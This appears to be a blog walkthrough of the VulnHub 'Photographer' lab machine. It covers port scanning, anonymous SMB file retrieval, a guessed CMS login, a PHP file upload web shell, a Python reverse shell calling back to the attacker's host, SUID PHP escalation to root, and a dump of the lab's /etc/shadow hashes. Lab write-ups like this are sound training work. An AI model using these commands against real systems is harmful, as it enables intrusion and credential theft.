VulnHub Photographer Walkthrough – PHP FTW!

My first streamed vulnerable machine was VulnHub Photographer, and I've finally finished the write-up!

VulnHub Photographer Walkthrough - Introduction

I haven't solved a VulnHub box since Casino Royale, so it was nice to get back into the swing of things.

This was a fairly simple box, but the PHP execution at the end definitely gave me some trouble.

You can find the VM here, and I'd say it is easy to intermediate difficulty.

Enumeration

First, I ran a ping sweep to see where the box was on my network.

root@kali:~/photographer# nmap -sn 192.168.5.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-13 19:30 EDT
Nmap scan report for pfSense.sanctuary (192.168.5.1)
Host is up (0.00020s latency).
MAC Address: 00:01:xx:xx:xx:xx (PC Partner)
Nmap scan report for 192.168.5.100

...

Host is up (0.0035s latency).
MAC Address: 38:F9:D3:CE:3F:89 (Unknown)
Nmap scan report for 192.168.5.131

Next, I ran a quick port scan, and discovered that ports 80, 139, 445, and 8000 were open on the target.

root@kali:~/photographer# nmap -A 192.168.5.131
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-13 19:33 EDT
Nmap scan report for 192.168.5.131
Host is up (0.00074s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
MAC Address: 08:00:27:C4:FF:DD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: PHOTOGRAPHER

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2020-08-13T19:33:24-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-13 19:33:24
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms 192.168.5.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.38 seconds

Finally, I ran enum4linux against the target (although I accidentally forgot to save the command output).

Initial Foothold

First, I used smbclient to connect to the open share that I discovered with enum4linux. As you can see, there were two files that I had unauthenticated access to, so I grabbed them.

root@kali:~/photographer# smbclient \\\\192.168.5.131\\sambashare
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul 20 21:30:07 2020
  ..                                  D        0  Tue Jul 21 05:44:25 2020
  mailsent.txt                        N      503  Mon Jul 20 21:29:40 2020
  wordpress.bkp.zip                   N 13930308  Mon Jul 20 21:22:23 2020

        278627392 blocks of size 1024. 264268400 blocks available
smb: \> get mailsent.txt
getting file \mailsent.txt of size 503 as mailsent.txt (23.4 KiloBytes/sec) (average 23.4 KiloBytes/sec)
smb: \> get wordpress.bkp.zip
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (38213.0 KiloBytes/sec) (average 36085.7 KiloBytes/sec)
smb: \> exit

While the WordPress backup didn't have anything too interesting, the mailsent.txt file contained either a hint or a password.

root@kali:~/photographer# cat mailsent.txt
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi 
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

When I looked at port 80, I found a basic website without anything terribly interesting.

VulnHub Photographer - Port 80

That said, port 8000 had a CMS that was running some sort of blog and photo album.

Port 8000 Koken

With a bit of google searching, I discovered the default Koken administrator login.

Koken Administrative portal

Using the e-mail address from the discovered mailsent file (daisa@photographer.com) along with the possible password (babygirl), I was able to login to the Koken administrative panel!

VulnHub Photographer - Successful Koken authentication

Looking around the panel, I found a place to upload images, along with a likely arbitrary file upload vulnerability.

Arbitrary file upload

After uploading my malicious PHP image, I used the pentestmonkey reverse shell cheat sheet and created a Python reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.5.132",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

When I visited my uploaded PHP shell, along with the embeded command, I received my reverse shell!

http://192.168.5.131:8000/storage/originals/3a/ad/image.php?cmd=%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%35%2e%31%33%32%22%2c%34%34%34%34%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%29%3b%27

root@kali:~/photographer# nc -lvp 4444
listening on [any] 4444 ...
192.168.5.131: inverse host lookup failed: Unknown host
connect to [192.168.5.132] from (UNKNOWN) [192.168.5.131] 54132
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

First, I grabbed the user flag from the daisa home directory, for my "proof" of exploitation.

www-data@photographer:/home$ cat daisa/user.txt
cat daisa/user.txt
d41d8cd98f00b204e9800998ecf8427e

Next, after searching the filesystem for SUID binaries, I found that PHP was SUID root.

www-data@photographer:/home$ ls -al /usr/bin/php7.2
ls -al /usr/bin/php7.2
-rwsr-xr-x 1 root root 4883680 Jul  9 13:40 /usr/bin/php7.2

While I was able to execute inline PHP commands, it took me a lot of trial and error to use this for escalation (as you can see from the excerpt below).

www/html/koken/storage/originals/3a/ad$ php -r 'system("/bin/sh")'
www-data@photographer:/var/www$ php -r 'system("/bin/sh")'
php -r 'system("/bin/sh")'
PHP Parse error:  syntax error, unexpected end of file in Command line code on line 1
www-data@photographer:/var/www$ php -r 'system("/bin/sh");'
php -r 'system("/bin/sh");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit
www-data@photographer:/var/www$ php -r 'system("/bin/sh -p");'
php -r 'system("/bin/sh -p");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit
www-data@photographer:/var/www$ php -r 'exec("/bin/sh -p");'
php -r 'exec("/bin/sh -p");'
id
id
exit
exit
www-data@photographer:/var/www$ which php
which php
/usr/bin/php
www-data@photographer:/var/www$ ls -al /usr/bin/php
ls -al /usr/bin/php
lrwxrwxrwx 1 root root 21 Jul 20 19:35 /usr/bin/php -> /etc/alternatives/php
www-data@photographer:/var/www$ /usr/bin/php7.2 -r 'exec("/bin/sh -p");'
/usr/bin/php7.2 -r 'exec("/bin/sh -p");'
id
id
exit
exit
www-data@photographer:/var/www$ /usr/bin/php7.2 -r 'system("/bin/sh -p");'
/usr/bin/php7.2 -r 'system("/bin/sh -p");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit
www-data@photographer:/var/www$ ls -al /usr/bin/php7.2
ls -al /usr/bin/php7.2
-rwsr-xr-x 1 root root 4883680 Jul  9 13:40 /usr/bin/php7.2
www-data@photographer:/var/www$ /usr/bin/php7.2 -r 'passthru("/bin/sh -p");'
/usr/bin/php7.2 -r 'passthru("/bin/sh -p");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit

That said, in the end, a StackOverflow post helped me to use pcntl_exec for execution.

www-data@photographer:/var/www$ php -r 'pcntl_exec("/bin/sh", ["-p"]);'
php -r 'pcntl_exec("/bin/sh", ["-p"]);'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

With my root privileges, I was able to grab the proof.txt file and complete the box!

# cat proof.txt
cat proof.txt
                                                                   
                                .:/://::::///:-`                                
                            -/++:+`:--:o:  oo.-/+/:`                            
                         -++-.`o++s-y:/s: `sh:hy`:-/+:`                         
                       :o:``oyo/o`. `      ```/-so:+--+/`                       
                     -o:-`yh//.                 `./ys/-.o/                      
                    ++.-ys/:/y-                  /s-:/+/:/o`                    
                   o/ :yo-:hNN                   .MNs./+o--s`                   
                  ++ soh-/mMMN--.`            `.-/MMMd-o:+ -s                   
                 .y  /++:NMMMy-.``            ``-:hMMMmoss: +/                  
                 s-     hMMMN` shyo+:.    -/+syd+ :MMMMo     h                  
                 h     `MMMMMy./MMMMMd:  +mMMMMN--dMMMMd     s.                 
                 y     `MMMMMMd`/hdh+..+/.-ohdy--mMMMMMm     +-                 
                 h      dMMMMd:````  `mmNh   ```./NMMMMs     o.                 
                 y.     /MMMMNmmmmd/ `s-:o  sdmmmmMMMMN.     h`                 
                 :o      sMMMMMMMMs.        -hMMMMMMMM/     :o                  
                  s:     `sMMMMMMMo - . `. . hMMMMMMN+     `y`                  
                  `s-      +mMMMMMNhd+h/+h+dhMMMMMMd:     `s-                   
                   `s:    --.sNMMMMMMMMMMMMMMMMMMmo/.    -s.                    
                     /o.`ohd:`.odNMMMMMMMMMMMMNh+.:os/ `/o`                     
                      .++-`+y+/:`/ssdmmNNmNds+-/o-hh:-/o-                       
                        ./+:`:yh:dso/.+-++++ss+h++.:++-                         
                           -/+/-:-/y+/d:yh-o:+--/+/:`                           
                              `-///////////////:`                               
                                                                                

Follow me at: http://v1n1v131r4.com


d41d8cd98f00b204e9800998ecf8427e

And, as usual, I grabbed the shadow file in case anyone wants to check these passwords one day.

cat /etc/shadow
root:$6$W89kMm7z$g5EDOgkjt/COwdYSXsgcKl2sWE1MIAqf6Gk0fnB6fv8OQCWk9VpwuZNkC17X0mbyc97UcAttT4ma1XI9Vknz91:18463:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:17954:0:99999:7:::
uuidd:*:17954:0:99999:7:::
lightdm:*:17954:0:99999:7:::
whoopsie:*:17954:0:99999:7:::
avahi-autoipd:*:17954:0:99999:7:::
avahi:*:17954:0:99999:7:::
dnsmasq:*:17954:0:99999:7:::
colord:*:17954:0:99999:7:::
speech-dispatcher:!:17954:0:99999:7:::
hplip:*:17954:0:99999:7:::
kernoops:*:17954:0:99999:7:::
pulse:*:17954:0:99999:7:::
rtkit:*:17954:0:99999:7:::
saned:*:17954:0:99999:7:::
usbmux:*:17954:0:99999:7:::
agi:$6$6.N5TR1M$41gUgxyG3m9njeVdW9vW6hgi/YwwgFJXEXwTNaH1DDVXgCX0AAayr7np2IWUYDvJ3gnSbsUHeplBfTUVRetXs0:18463:0:99999:7:::
daisa:$6$mxTjNcEI$YhSL7MEyC1zUQa8Xo0CaZBeOSE2PmEHrk1Zf9M20.7Lu1s/IvXkkryme7st2ju73DpzQGCtv8owDUC4KmX47R.:18463:0:99999:7:::
mysql:!:18463:0:99999:7:::

Video Highlight

If you'd rather watch the stream highlight rather than read all this text, then you can find it here.

To catch me live, be sure to follow me on Twitch!

VulnHub Photographer Walkthrough - Conclusion

This was a fun box, and a great start to my hacking streams.

I've done this for about 4 weeks so far, and completed over 10 boxes!

Be sure to follow the stream and watch every Thursday, but let me know if there is anything else that you want to see.

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

As an Amazon Associate I earn from qualifying purchases.

Common passed on this blog, I made it to a jam.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.